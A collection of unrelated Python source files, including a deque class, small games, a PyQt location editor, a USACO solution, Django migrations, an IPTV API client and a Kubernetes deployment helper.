string += str(self.__contents[self.__back])
string += ' ]'
return string
def __len__(self):
return self.__size
def __grow(self):
a=[None]
self.__capacity = self.__capacity*2
a=a*self.__capacity
for i in range(len(self.__contents)):
x=(self.__front+i)% len(self.__contents)
a[i]=self.__contents[x]
self.__contents = a
self.__front=0
self.__back=self.__size-1
def push_front(self, val):
if self.__size+1 > self.__capacity:
self.__grow()
self.__front =(self.__front -1 + self.__capacity) % self.__capacity
self.__contents[self.__front]=val
self.__size +=1
def pop_front(self):
if self.__size==0:
raise IndexError
a=self.__contents[self.__front]
self.__contents[self.__front]=None
self.__front=(self.__front + 1 +self.__capacity)%self.__capacity
self.__size -=1
return a
def peek_front(self):
return self.__contents[self.__front]
def push_back(self, val):
if self.__size+1 > self.__capacity:
self.__grow()
if self.__size == 0:
self.__contents[self.__back]=val
self.__size+=1
else:
self.__back = self.__back + 1
self.__contents[self.__back]=val
self.__size+=1
def pop_back(self):
if self.__size==0:
raise IndexError
a=self.__contents[self.__back]
self.__contents[self.__back]=None
self.__back-=1
self.__size-=1
return a
def peek_back(self):
return self.__contents[self.__back]
#if __name__ == '__main__':
|
20,749 | c48ac784bc9a0db016cb2519ae007238a59920aa | from command import Command, CommandInterface
class Monitor(Command):
def __init__(self, owning_service, version):
self.owning_service = owning_service
self.interface = CommandInterface('monitor', 'Monitor Insteon messages', version, self,
{'--filter_command': {'type':str,
'dest':'num',
'action':'store',
'help':'show only received msgs of this command number'}})
def execute(self, args):
if self.owning_service.is_initialized():
plm = self.owning_service.get_plm()
plm.monitor(args.num)
ret = ['Monitoring terminated']
else:
ret = ['PLM is not initialized']
return ret
|
20,750 | edd89804b959a2251d3646924536a3cb16ee5343 | """
@copyright Copyright 2017 GNSS Sensor Ltd. All right reserved.
@author Sergey Khabarov - sergeykhbr@gmail.com
@brief General thread safe methods.
"""
import sys
def safe_print(content):
#print "{0}".format(content)
sys.stdout.write(content + '\n')
|
20,751 | 196c8548afa618487144b25acaf55f71c1a03d25 | #My museum game beause I'm tired of my games killing people. :)
import random
class Player(object):
def __init__(self, name):
self.name = name
self.pocket = []
def pocket_it(self, item):
self.pocket.append(item)
def check_pocket():
#List what is currently in Player's pocket
print pocket
class Exhibit(object):
def __init__(self, name, description):
self.name = name
self.description = description
all_exhibits = []
def create_exhibits():
exhibits_fd = open("/home/jessa/lpthw/Museum Game/exhibits.txt", "r")
exhibits = exhibits_fd.read()
exhibits_fd.close()
exhibits = exhibits.split("-----")
for item in exhibits:
clean_item = item.strip()
exhibit = clean_item.split("\n", 1)
e = Exhibit(exhibit[0].strip(), exhibit[1].strip())
all_exhibits.append(e)
return all_exhibits
create_exhibits()
strange_spacefacts = {}
def import_strangefacts():
strangefacts_fd = open("/home/jessa/lpthw/Museum Game/strangefacts.txt", "r")
strangefacts = strangefacts_fd.read()
strangefacts_fd.close()
facts = strangefacts.split("-----")
for item in facts:
clean_item = item.strip()
strangefacts = clean_item.split(":", 1)
strange_spacefacts[strangefacts[0].strip()] = strangefacts[1].strip()
import_strangefacts()
class Room(object):
def __init__(self, name, description):
self.name = name
self.description = description
self.exit = False
def enter(self, player):
self.exit = False
while not self.exit: #While self.exit is false call self.explore
self.explore(player)
#default setting of a room is to enter and if there is nothing to explore, exit.
def explore(self, player):
self.exit = True
class Dinosaur(Room):
def explore(self, player):
print(self.description)
choice = raw_input("What would you like to explore next? Type 'exit' to leave the room or type the name of the place in this room you would like to explore. > ")
if "exit" == choice:
print "You have exited the %s. Where would you like to go?" % self.name
self.exit = True
elif "look" in choice:
print(self.description)
elif "sand" in choice:
self.sand(player)
elif "skeleton" in choice:
print "The skeleton has a placard beside it."
print all_exhibits[0].description
elif "timeline" in choice:
print all_exhibits[1].description
def sand(self, player):
print """There is a tub of sand beneath a big sign with instructions.
A paleontologist is a scientist who studies fossils. Today you are going to
be an amateur paleontologist. A fossil is the remains or impression of a prehistoric
organism preserved in a mold or cast in rock.
In this sand are 5 fossils and 5 regular artifacts.
Can you tell the difference? Type 'True' if the artifact you find is a fossil and
'False' if it is not."""
artifacts = {
'rusty bottlecap': False, 'ammonite': True, 'trilobite': True, 'coral': True,
'gastropod': True, 'vertebrate': True, 'chopstick': False,
'token': False, 'agate slice': False, 'old bolt': False
}
while len(artifacts) > 0:
random_artifact = random.choice(artifacts.keys())
print "You go digging and pull up a %s." % random_artifact
if random_artifact == "token":
print "You found the token!"
player.pocket_it(random_artifact)
break
else:
guess = raw_input("Type 'True' if you think it is a fossil. Otherwise type 'False' > ")
if guess == str(artifacts[random_artifact]):
print "That is correct!"
else:
print "That is incorrect."
del artifacts[random_artifact]
if len(artifacts) == 0:
print "There are no more items in the sand. You have already played this game."
class SpaceExploration(Room):
def explore(self, player):
print(self.description)
choice = raw_input("What would you like to explore?")
if 'exit' in choice:
self.exit = True
elif 'look' in choice:
print(self.description)
elif "left" in choice or "star" in choice:
print "The star has a placard beside it."
print all_exhibits[2].description
elif "strange" in choice or "facts" in choice or "straight" in choice:
print "You rotate through a list of 5 strange facts. Click enter for a new strange fact. Enter 'exit' to leave this game."
while len(strange_spacefacts) > 0:
choice = raw_input("> ")
if 'exit' in choice:
print("Ok, fine, quitter.")
break
space_fact = random.choice(strange_spacefacts.keys())
print "Here is your fact about %s." %space_fact
print strange_spacefacts[space_fact]
del strange_spacefacts[space_fact]
elif "planets" in choice or "right" in choice:
planets = ["Earth", "Jupiter", "Mercury", "Uranus", "Venus", "Saturn", "Neptune", "Mars"]
planets_in_order = ["Mercury", "Venus", "Earth", "Mars", "Jupiter", "Saturn", "Uranus", "Neptune"]
player_planets = []
n = 0
print "There are 8 planets in our solar system. Here they are in no particular order:", planets
print "Start by typing the name of the planet closest to the sun and press enter."
print "If you have gotten the first planet correct you will see 'Correct, what is the next furthest planet from the sun' and it will print your list so far."
while player_planets != planets_in_order:
guess = raw_input ("> ")
if guess == planets_in_order[n]:
player_planets.append(guess)
print "Correct! Here is your list so far: %s What is the next furthest planet from the sun?" %player_planets
n += 1
else:
print "That is not correct. Try again."
#fix this
dino_desc = """At the center of the room you see a huge dinosaur skeleton looming over you.
To the left is a sand pit that contains fossils. To the right is a large
timeline. What would you like to explore?"""
dino_room = Dinosaur("Dinosaur Room", dino_desc)
space_desc = """To your left there is what looks like a shooting star painted on the wall, to your right is a flexible mobile
with planets, and straight ahead is a rotating dial with 'Strange Space Facts'. Which would you like to explore first?"""
space_room = SpaceExploration("Space Exploration Room", space_desc)
class Game(object):
def __init__(self, player):
self.player = player
self.rooms = {'dino': dino_room, 'space': space_room}
self.over = False
self.welcome = """You find yourself standing in a museum. There is a dinosaur exhibit to your left and a space exhibit to your right."""
self.current_room = None
def explore(self):
choice = raw_input("> ")
if 'left' in choice:
return self.rooms['dino']
elif 'right' in choice:
return self.rooms['space']
elif 'exit' in choice:
self.over = True
else:
print("Invalid choice.")
return None
def loop(self):
while not self.over:
if self.current_room is None:
print(self.welcome)
room = self.explore()
if room is None:
continue
self.current_room = room
self.current_room.enter(self.player)
self.current_room = None
def main():
name = raw_input("What is your name? > ")
player = Player(name)
game = Game(player)
game.loop()
if __name__ == '__main__':
main()
#import guard to keep everything from running if you are not trying to play it.
|
20,752 | f4b4f2571d8fe0baebe325bad49961458e266601 | from ui.editLocationDialog import Ui_Dialog as ui
from ui.dialog_umbenennen import Ui_Dialog_Umbenennen as renameDialog
from PyQt5 import QtWidgets, Qt
from PyQt5.QtWidgets import QMessageBox, QDialogButtonBox, QDialog
from PyQt5.QtCore import Qt as qt, QObject, pyqtSignal
from db import db
class editLocSubWindow(QtWidgets.QDialog):
def __init__(self, parent = None):
super().__init__(parent)
self.ui = ui()
self.ui.setupUi(self)
self.setWindowTitle("Lagerorte bearbeiten")
self.ui.lbl_SubLocation.clear()
self.mainlocationlist = self.ui.lw_MainLocation
self.sublocationlist = self.ui.lw_Sublocation
self.newmainlocationtextbox = self.ui.le_newMainLocation
self.buttonwritenewmainlocation = self.ui.pb_addnewMainLocation
self.buttonwritenewsublocation = self.ui.pb_addnewSubLocation
self.newsublocationtextbox = self.ui.le_newSubLocation
self.newsublocationtextbox.setEnabled(False)
self.initUi()
def initUi(self):
self.mainlocationlist.currentItemChanged.connect(self.mainlocationchanged)
self.sublocationlist.currentItemChanged.connect(self.sublocationchanged)
self.ui.pb_removeMainLocation.clicked.connect(self.removemainlocation)
self.ui.pb_removeSubLocation.clicked.connect(self.removesublocation)
self.newmainlocationtextbox.textChanged.connect(self.enableAddnewMainButton)
self.newsublocationtextbox.textChanged.connect(self.enableAddnewSubButton)
self.buttonwritenewmainlocation.clicked.connect(self.writenewmainlocation)
self.buttonwritenewsublocation.clicked.connect(self.writenewsublocation)
self.ui.le_newMainLocation.returnPressed.connect(self.writenewmainlocation)
self.ui.le_newSubLocation.returnPressed.connect(self.writenewsublocation)
self.ui.pb_editMainLocation.clicked.connect(self.renameLocation)
self.ui.pb_editSubLocation.clicked.connect(self.renameLocation)
self.readMainLocationinListWidget()
def updatesignal(self):
print("updatesignal")
def renameLocation(self):
print(self.sender())
sender = self.sender().objectName()
if sender == 'pb_editMainLocation':
print("renameMain")
currentitem = self.mainlocationlist.selectedItems()
location = currentitem[0].data(qt.UserRole)
self.renDialog = renameWindow('main', location)
if self.renDialog.exec() == QDialog.Accepted:
print("ok geklickt")
self.update()
else:
print("Abgebrochen")
elif sender == 'pb_editSubLocation':
print("renameSub")
currentitem = self.sublocationlist.selectedItems()
location = currentitem[0].data(qt.UserRole)
self.renDialog = renameWindow('sub', location)
if self.renDialog.exec() == QDialog.Accepted:
print("ok geklickt")
self.updateSubLocationlist()
else:
print("Abgebrochen")
def writenewmainlocation(self):
newlocation = self.newmainlocationtextbox.text().strip()
if len(str.replace(newlocation," ","")) > 0:
if db.addLocation('main', newlocation):
print("Erfolgreich gespeichert")
self.update()
else:
QMessageBox.critical(self, 'Fehler!',
"Fehler beim schreiben. {location} ist bereits vorhanden! Bitte anderen Namen wählen.".format(location=newlocation),
QMessageBox.Ok)
else:
print("Leerzeichen")
def writenewsublocation(self):
newlocation = self.newsublocationtextbox.text().strip()
currentmainitem = self.mainlocationlist.selectedItems()
mainlocation = currentmainitem[0].data(qt.UserRole)
if len(str.replace(newlocation," ","")) > 0:
if db.addLocation('sub', newlocation, mainlocation[0]):
print("Erfolgreich gespeichert")
self.newsublocationtextbox.clear()
self.updateSubLocationlist()
else:
#Nicht mehr implementiert da das feld name nicht mehr unique ist
QMessageBox.critical(self, 'Fehler!',
"Fehler beim schreiben. {location} ist bereits vorhanden! Bitte anderen Namen wählen.".format(location=newlocation),
QMessageBox.Ok)
else:
print("Leerzeichen")
def enableAddnewMainButton(self):
if len(self.newmainlocationtextbox.text()) > 0:
self.ui.pb_addnewMainLocation.setEnabled(True)
else:
self.ui.pb_addnewMainLocation.setEnabled(False)
def enableAddnewSubButton(self):
if len(self.newsublocationtextbox.text()) > 0:
self.ui.pb_addnewSubLocation.setEnabled(True)
else:
self.ui.pb_addnewSubLocation.setEnabled(False)
def removesublocation(self):
currentitem = self.sublocationlist.selectedItems()
locationtoremove = currentitem[0].data(qt.UserRole)
buttonReply = QMessageBox.question(self, 'Löschen!',
"Willst du den Lagerunterort \"{ort}\" wirklich löschen?".format(
ort=locationtoremove[1]),
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if buttonReply == QMessageBox.Yes:
if db.removeLocation('sub', locationtoremove[0]):
print('erfolgreich gelöscht')
self.updateSubLocationlist()
else:
pass
def removemainlocation(self):
currentitem = self.mainlocationlist.selectedItems()
locationtoremove = currentitem[0].data(qt.UserRole)
buttonReply = QMessageBox.question(self, 'Löschen!',
"Willst du den Lagerort \"{ort}\" wirklich löschen?".format(ort=locationtoremove[1]),
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if buttonReply == QMessageBox.Yes:
if db.removeLocation('main', locationtoremove[0]):
print('erfolgreich gelöscht')
self.update()
else:
pass
#print(locationtoremove)
def sublocationchanged(self, item):
self.ui.pb_removeSubLocation.setEnabled(True)
self.ui.pb_editSubLocation.setEnabled(True)
print('test')
def mainlocationchanged(self, item):
if item:
self.sublocationlist.clear()
self.ui.pb_removeSubLocation.setEnabled(False)
self.ui.pb_editSubLocation.setEnabled(False)
self.ui.pb_editMainLocation.setEnabled(True)
self.ui.pb_removeMainLocation.setEnabled(True)
self.newsublocationtextbox.setEnabled(True)
mainLocation = item.data(qt.UserRole)
sublocations = db.readLocations('sub', mainLocation[0])
self.ui.lbl_SubLocation.setText(mainLocation[1])
for e in sublocations:
self.sublocationlist.addItem(self.makeListItem(e))
else:
pass
def updateSubLocationlist(self):
self.sublocationlist.clear()
mainlocation = self.mainlocationlist.selectedItems()[0].data(qt.UserRole)[0]
sublocations = db.readLocations('sub', mainlocation)
for e in sublocations:
self.sublocationlist.addItem(self.makeListItem(e))
if self.sublocationlist.count() == 0:
self.ui.pb_removeSubLocation.setEnabled(False)
self.ui.pb_editSubLocation.setEnabled(False)
def readMainLocationinListWidget(self):
self.mainlocationlist.clear()
mainLocation = db.readLocations('main')
for e in mainLocation:
self.mainlocationlist.addItem(self.makeListItem(e))
def makeListItem(self,daten):
data = []
listItem = Qt.QListWidgetItem()
listItem.setText(daten['name'])
for i in daten:
data.append(daten[i])
listItem.setData(qt.UserRole, data)
return listItem
def update(self, *__args):
print('update')
self.newmainlocationtextbox.clear()
self.readMainLocationinListWidget()
self.ui.pb_removeSubLocation.setEnabled(False)
self.ui.pb_editSubLocation.setEnabled(False)
if self.mainlocationlist.count() == 0:
self.ui.pb_removeMainLocation.setEnabled(False)
self.ui.pb_editMainLocation.setEnabled(False)
self.sublocationlist.clear()
class renameWindow(QtWidgets.QDialog):
def __init__(self, type, data, parent = None):
super().__init__(parent)
self.type = type
self.ui = renameDialog()
self.ui.setupUi(self)
self.data = data
self.setWindowTitle("Umbenennen")
self.initUi()
def initUi(self):
if self.type == 'main':
currentname = self.data[1]
self.locationid = self.data[0]
self.ui.le_locationname.setText(str(currentname))
print("mainitem")
elif self.type == 'sub':
currentname = self.data[2]
self.locationid = self.data[0]
self.ui.le_locationname.setText(str(currentname))
print("subitem")
self.ui.buttonBox.button(QDialogButtonBox.Ok).clicked.connect(self.rename)
def rename(self):
newname = self.ui.le_locationname.text()
if db.renameLocations(self.type, self.locationid, newname):
print("Erfolgreich umbenannt")
|
20,753 | d81a6a42cce6f8eb48453783fef85b4a24f4b8a0 | """
ID: mail4rp1
LANG: PYTHON3
TASK: milk2
"""
# ***************** NEED TO FIND: *******************
# - The longest time interval at least one cow was milked.
# - The longest time interval (after milking starts) during which no cows were being milked.
with open("milk2.in") as f:
lines = [line.strip() for line in f.readlines()]
num_cows = int(lines[0])
times = []
for i in range (num_cows):
nums = tuple([int(n) for n in lines[i + 1].split(" ")])
times.append(nums)
start = 1000000
end = 0
for time in times:
if time[0] < start:
start = time[0]
if time[1] > end:
end = time[1]
# print(times)
# print("start :", start)
# print("end :", end)
check = {}
longest_idle = 0
longest_milking = 0
current_milking = 0
current_idle = 0
for second in range(start, end):
check[second] = False
for time in times:
if second >= time[0] and second < time[1]:
check[second] = True
# ******************************************************************
milking = check[second]
if milking:
current_milking += 1
if current_milking > longest_milking:
longest_milking = current_milking
current_idle = 0
else:
current_idle += 1
if current_idle > longest_idle:
longest_idle = current_idle
current_milking = 0
# 11111111111111111111000000000000111111000000000011111100000000000111111111111111111111111111
with open("milk2.out", "w") as f:
f.write(str(longest_milking) + ' ' + str(longest_idle))
f.write("\n")
# times = [
# (300, 1000), # cow 1
# (700, 1200), # cow 2
# (1500, 2100) # cow 3
# ]
# # returns list of lists of start and end milking times
# def readInput():
# fin = open("milk2.in")
# data = fin.readlines()
# fin.close()
#
# times = []
# for i in range(1,len(data)):
# times.append([int(data[i].split()[0]), int(data[i].split()[1])])
# return times
#
# # returns dictionary of times when milking was active
# def createDict(times):
# # find earliest and latest time
# earliestTime = 1000000
# latestTime = 0
# for time in times:
# if time[0] < earliestTime:
# earliestTime = time[0]
# if time[1] > latestTime:
# latestTime = time[1]
#
# # set up dictionary of milking times
# milkTimes = {}
# for i in range(earliestTime, latestTime):
# milkTimes[i] = False
#
# # fill dictionary based on when milking was active
# for time in times:
# startTime = time[0]
# endTime = time[1]
# for i in range(startTime, endTime):
# milkTimes[i] = True
#
# return milkTimes, earliestTime, latestTime
#
# # returns longest consecutive milking and non-milking times
# def calcTimes(milkTimes, earliestTime, latestTime):
# longestMilkTime = 0
# currentMilkTime = 0
# longestNoMilkTime = 0
# currentNoMilkTime = 0
# for key in range(earliestTime, latestTime):
# if milkTimes[key]:
# currentMilkTime += 1
# if currentMilkTime > longestMilkTime:
# longestMilkTime = currentMilkTime
# currentNoMilkTime = 0
# else:
# currentNoMilkTime += 1
# if currentNoMilkTime > longestNoMilkTime:
# longestNoMilkTime = currentNoMilkTime
# currentMilkTime = 0
#
# return longestMilkTime, longestNoMilkTime
#
# # writes output
# def writeOutput(longestMilkTime, longestNoMilkTime):
# fout = open("milk2.out","w")
# fout.write(str(longestMilkTime) + " " + str(longestNoMilkTime) + "\n")
# fout.close()
#
# times = readInput()
# milkTimes, earliestTime, latestTime = createDict(times)
#longestMilkTime, longestNoMilkTime = calcTimes(milkTimes, earliestTime, latestTime)
# writeOutput(longestMilkTime, longestNoMilkTime)
|
20,754 | 15f100546d18ef85940916f9e5d1f762bdfb0768 | # !/usr/bin/env python3
import sys
file1 = open('jep387-all.patch', 'r')
lines = file1.readlines()
files_and_destinations = (
# <name>, <patch file>
# order matters: order these patterns in order of speciality
# match misc unless...
('/src', 'misc'),
# everything in memory/metaspace shall be core unless ...
('/src/hotspot/share/memory/metaspace/', 'core'),
# all these files go to misc
('/src/hotspot/share/memory/metaspace/metaspaceDCmd', 'misc'),
('/src/hotspot/share/memory/metaspace/metaspaceSizesSnapshot', 'misc'),
('/src/hotspot/share/memory/metaspace/printCLDMetaspaceInfoClosure', 'misc'),
('/src/hotspot/share/memory/metaspace/printMetaspaceInfoKlassClosure', 'misc'),
# or to test
('/src/hotspot/share/memory/metaspace/metaspace_test', 'test'),
# core
('/src/hotspot/share/memory/metaspace.hpp', 'core'),
('/src/hotspot/share/memory/metaspace.cpp', 'core'),
('/src/hotspot/share/prims/whitebox', 'test'),
# anything in test go to test
('/test', 'test'),
)
lines_core_patch = []
lines_misc_patch = []
lines_test_patch = []
count = 0
destination = None
for line in lines:
#print("line {} ; {}".format(count, line.strip()))
#count = count + 1
if line.startswith('diff --git'):
for match in files_and_destinations:
if line.startswith('diff --git a' + match[0]):
destination = match[1]
if destination is None:
sys.exit('no rule for: ' + line)
print(line.strip() + " -> " + destination)
if destination is not None:
if destination == 'test':
lines_test_patch.append(line)
elif destination == 'core':
lines_core_patch.append(line)
elif destination == 'misc':
lines_misc_patch.append(line)
file = open('jep387-core.patch', 'w')
file.writelines(lines_core_patch)
file.close()
file = open('jep387-test.patch', 'w')
file.writelines(lines_test_patch)
file.close()
file = open('jep387-misc.patch', 'w')
file.writelines(lines_misc_patch)
file.close()
if len(lines_core_patch) + len(lines_test_patch) + len(lines_misc_patch) < len(lines) - 8:
sys.exit("too few lines")
#print('CORE')
#print(*lines_core_patch, sep = "\n")
#print('TEST')
#print(*lines_test_patch, sep = "\n")
#print('MISC')
#print(*lines_misc_patch, sep = "\n")
|
20,755 | 18aabb76fb810c4ed0e6edef60efca4c17e208b0 | from sklearn import metrics
from sklearn.cluster import DBSCAN
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from pandas.plotting import scatter_matrix
if __name__ == '__main__':
beer = pd.read_csv('data.txt', sep=' ')
X = beer[["calories", "sodium", "alcohol", "cost"]]
db = DBSCAN(eps=10, min_samples=2).fit(X)
# 分类结果
labels = db.labels_
# print(labels)
beer['cluster_db'] = labels
beer.sort_values('cluster_db')
# print(beer.sort_values('cluster_db'))
#
# print(beer.groupby('cluster_db').mean())
colors = np.array(['red', 'green', 'blue', 'yellow'])
scatter_matrix(X, c=colors[beer.cluster_db], figsize=(10, 10), s=100)
plt.show()
|
20,756 | b622e8162ed5a4b97c142840b4adde086f0051fe | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# programa1.py - Primeiro programa
"""
Importa o módulo random e sorteia
um número inteiro entre 1 e 100
"""
import random
numero = random.randint(1,100)
escolha = 0
tentativas = 0
while escolha != numero:
escolha = input("Escolha um número entre 1 e 100:")
tentativas += 1
if escolha < numero:
print "O número", escolha ,"é menor que o sorteado."
elif escolha > numero:
print "O número", escolha ,"é maior que o sorteado."
print "Parabéns! Você acertou com", tentativas ," tentativas"
|
20,757 | 84d8695929b7f6eac5ccf3b6b3eeee3b24eaf72e | # Generated by Django 3.1.1 on 2020-09-21 22:25
from django.conf import settings
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('myside', '0020_auto_20200922_0659'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='img',
field=models.ImageField(blank=True, null=True, upload_to='comments/%Y/%m/%d'),
),
migrations.AlterField(
model_name='comment',
name='stars',
field=models.FloatField(blank=True, null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(5)]),
),
]
|
20,758 | c83c2efe498d9a0a04ed77eb647cf3cd6562b488 | from .folders_widget import FoldersWidget
|
20,759 | 4b272a5a7ca482d0e3f7b267cb484b44608cc096 | # Generated by Django 2.0.7 on 2018-09-18 09:00
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('scheduyapp', '0008_auto_20180918_1051'),
]
operations = [
migrations.AlterModelOptions(
name='taskgroup',
options={'verbose_name': 'Group'},
),
]
|
20,760 | aa2a00a8135db4e9422c600683d822874a0e344f | # -*- coding: utf-8 -*-
import requests
import uuid
class Megatv():
request_headers = {
'requestHostname': 'otmapp',
'User-Agent': 'OMS (compatible;ServiceType/OTM;DeviceType/WIN8PAD;DeviceModel/G41TM6;OSType/WINM;OSVersion/8.1.0;AppVersion/1.2.1.1)'
}
applicationKey = 'IG9RIXFXD24R1DS2LRSD1HKLD8QQZKL6'
def __init__(self):
self.websession = requests.Session()
self.userinfo = None
self.uuid = uuid.uuid4().hex
self.session_id = None
def login(self, username, password, raw=False):
userinfo = self.websession.post('https://omas.megatvdnp.co.kr/login/olleh', json={'userId': username, 'userPwd': password}, headers={'applicationKey': self.applicationKey, 'transactionId': '0', 'timestamp': '', 'requestHostname': 'otmapp'}).json()
if raw:
return userinfo
if userinfo.get('systemMessage') == u'로그인에 성공하였습니다.':
self.userinfo = userinfo
return True
else:
return False
def login_token(self, token, raw=False):
userinfo = self.websession.post('https://omas.megatvdnp.co.kr/login/auto', json={'toknVal': token}, headers={'applicationKey': self.applicationKey, 'transactionId': '0', 'timestamp': '', 'requestHostname': 'otmapp'}).json()
if raw:
return userinfo
if userinfo.get('systemMessage') == u'로그인에 성공하였습니다.':
self.userinfo = userinfo
return True
else:
return False
def session_create(self, raw=False):
session = self.websession.post('http://contents.megatvdnp.co.kr/app5/0/API/create_session.aspx', headers=self.request_headers, params={'uuid': self.uuid}).json()
if raw:
return session
if session.get('meta').get('code') == 200:
self.session_id = session.get('data').get('session_id')
return self.session_id
else:
return False
def session_ready(self, raw=False):
session = self.websession.post('http://contents.megatvdnp.co.kr/app5/0/API/ready_session.aspx', headers=self.request_headers, params={'uuid': self.uuid}).json()
if raw:
return session
if session.get('meta').get('code') == 200:
return True
else:
return False
def session_check(self, session_id=None, raw=False):
if session_id is None:
session_id = self.session_id
session = self.websession.post('http://contents.megatvdnp.co.kr/app5/0/API/check_session.aspx', headers=self.request_headers, params={'uuid': self.uuid, 'session_id': session_id}).json()
if raw:
return session
if session.get('meta').get('code') == 200:
return True
else:
return False
def session_delete(self, session_id=None, raw=False):
if session_id is None:
session_id = self.session_id
session = self.websession.post('http://contents.megatvdnp.co.kr/app5/0/API/delete_session.aspx', headers=self.request_headers, params={'uuid': self.uuid, 'session_id': session_id}).json()
if raw:
return session
if session.get('meta').get('code') == 200:
self.session_id = None
return True
else:
return False
def get_channels(self, test=False, raw=False):
if test:
test = 1
else:
test = 0
channels = self.websession.get('http://menu.megatvdnp.co.kr:38080/app5/0/api/epg_chlist', params={'category_id': 1, 'istest': test}, headers=self.request_headers).json()
if raw:
return channels
if channels.get('meta').get('code') == '200':
return channels.get('data').get('list')[0].get('list_channel')
else:
return None
def get_my_channels(self, test=False, raw=False):
if test:
test = 1
else:
test = 0
channels = self.websession.get('http://menu.megatvdnp.co.kr:38080/app5/0/api/epg_chlist', params={'category_id': 1, 'istest': test}, headers=self.request_headers).json()
if raw:
return channels
if channels.get('meta').get('code') == '200':
return channels.get('data').get('list')[0].get('list_my_channel')
else:
return None
def get_epg(self, ch_no, test=False, raw=False):
if test:
test = 1
else:
test = 0
epgdata = self.websession.get('http://menu.megatvdnp.co.kr:38080/app5/0/api/epg_proglist', params={'ch_no': ch_no, 'istest': test}, headers=self.request_headers).json()
if raw:
return epgdata
if epgdata.get('meta').get('code') == '200':
return epgdata.get('data').get('list')
else:
return None
def get_channel_url(self, ch_no, bit_rate, raw=False):
request_query = {
'istest': 0,
'ch_no': ch_no,
'bit_rate': 'S',
'bit_rate_option': bit_rate,
'user_model': 'G41TM6',
'user_os': 'Win10.0',
'user_type': 'Computer.Desktop',
'user_net': 'WIFI'
}
urlinfo = self.websession.get('http://menu.megatvdnp.co.kr:38080/app5/0/api/epg_play', headers=self.request_headers, params=request_query).json()
if raw:
return urlinfo
if urlinfo.get('meta').get('code') == '200':
return urlinfo.get('data')
else:
return None
|
20,761 | 5139568f8eaaaf5fafc0d8a9f01aae89c5a41ea8 | #Print * Rectangle
'''
*****
*****
*****
*****
*****
'''
for i in range(1,6):
for j in range(1,6):
print("*",end="") # By default line ended with new line, here we define, nothing to be added at the end of line
print()
print(" 22222 +++++++ =======================================")
#Print * Rectangle
'''
*****
* *
* *
* *
*****
'''
for i in range(1,6):
for j in range(1,6):
if(i==1 or i==5):
print("*",end="")
else:
if(j==1 or j==5):
print("*", end="")
else:
print(" ",end="")
print() |
20,762 | 96ce8b4fd12e404bd6db252fad3f473f3d727374 | import yaml
import os
import time
import json
import re
BASE_PATH = '/Users/ssharat/Documents/'
INPUT_YAML = BASE_PATH + 'acme/acme_fitness_demo/deploy_acme.yaml'
class DeployApplication(object):
def __init__(self, _yaml, _app):
try:
with open(_yaml, "r") as stream:
self._app = _app
self.deploy_info = yaml.load(stream, Loader=yaml.FullLoader)
self.deployments = []
# Extract features
self.ns = self.deploy_info[_app]['namespace']
if self._app == 'acme_application':
node_label_map = self.deploy_info[_app]['nodeselector']
if node_label_map:
for node, label in node_label_map.items():
_ = os.system('kubectl label nodes %s %s' % (node, label))
self.secrets = self.deploy_info[_app]['secret']
self.deployments = self.deploy_info[_app]['deploy']
self.configmaps = self.deploy_info[_app]['configmap']
elif self._app == 'wavefront_application':
self.token = self.deploy_info[_app]['api_token']
self.url = self.deploy_info[_app]['wavefront_url']
self.cluster = self.deploy_info[_app]['cluster_name']
except OSError:
print('File not found - check path!')
return
except IndexError:
print('Application %s not found in YAML' % _app)
return
def check_deployment(self):
cmd = 'kubectl get pods -n %s -o json | jq' % self.ns
get_pods_raw = os.popen(cmd).read().strip().replace('\n', '')
get_pods_json = json.loads(get_pods_raw)
for _item in get_pods_json['items']:
# print(_item['status']['phase'], _item['metadata']['name'])
if _item['status']['phase'] != 'Running':
print("POD %s in state %s" % (_item['metadata']['name'], _item['status']['phase']))
print("Sleep 10sec and retry!")
time.sleep(10)
return self.check_deployment()
print('All PODs in running state')
def create_ns(self):
_ = os.system("kubectl create ns %s" % self.ns)
def create_secret(self):
for secret in self.secrets:
_ = os.system('kubectl create secret %s -n %s' % (secret, self.ns))
def deploy(self):
for deploy in self.deployments:
print('Deploying %s in ns %s' % (deploy, self.ns))
_ = os.system('kubectl apply -f %s -n %s' % (deploy, self.ns))
self.check_deployment()
# Start essential services
if self._app == 'acme_application':
print('Starting Front-End application:')
out = os.popen('minikube service --url frontend -n %s' % self.ns)
print(out)
elif self._app == 'wavefront_application':
print('Deploying wavefront proxy and collector using helm-charts')
out = os.popen('helm install wavefront wavefront/wavefront '
'--set wavefront.url=%s '
'--set wavefront.token=%s '
'--set clusterName=%s '
'--namespace=%s' % (self.url, self.token, self.cluster, self.ns)).read()
print(out)
def create_configmap(self):
for configmap in self.configmaps:
_ = os.system('kubectl create -f %s -n %s' % (configmap, self.ns))
def update_config(self):
'''
Function to update config due to change of dynamic config params
:return:
'''
# Fetch the ip-address of Jaeger POD in acme namespace and update the
# deployment yamls
cmd = 'kubectl get pods -n %s -o json | jq' % self.ns
get_pods_raw = os.popen(cmd).read().strip().replace('\n', '')
get_pods_json = json.loads(get_pods_raw)
for _item in get_pods_json['items']:
if 'jaeger' in _item['metadata']['name']:
pod_ip = _item['status']['podIP']
break
# Replace jaeger-agent host in deployment files
for deploy in self.deployments:
new_file_content = ""
replace_str = False
read_file = open(deploy, 'r')
print('Replacing pod-ip %s in file %s' % (pod_ip, deploy))
for line in read_file:
if replace_str:
line = re.sub("value.*", "value: \'%s\'" % pod_ip, line)
replace_str = False
if 'JAEGER_AGENT_HOST' in line:
replace_str = True
new_file_content += line
read_file.close()
write_file = open(deploy, "w")
write_file.write(new_file_content)
write_file.close()
# Driver-code
if __name__ == '__main__':
# Workflow-1: Instantiate class to deploy acme microservices
acme = DeployApplication(INPUT_YAML, 'acme_application')
# acme.create_ns()
acme.update_config()
# acme.create_secret()
# acme.create_configmap()
acme.deploy()
# Workflow-2: Instantiate class to deploy wf
# wf = DeployApplication(INPUT_YAML, 'wavefront_application')
# wf.create_ns()
# wf.deploy()
|
20,763 | 3fee72a1dd914c0d1aff988416709e6a0402c6e5 | import movie
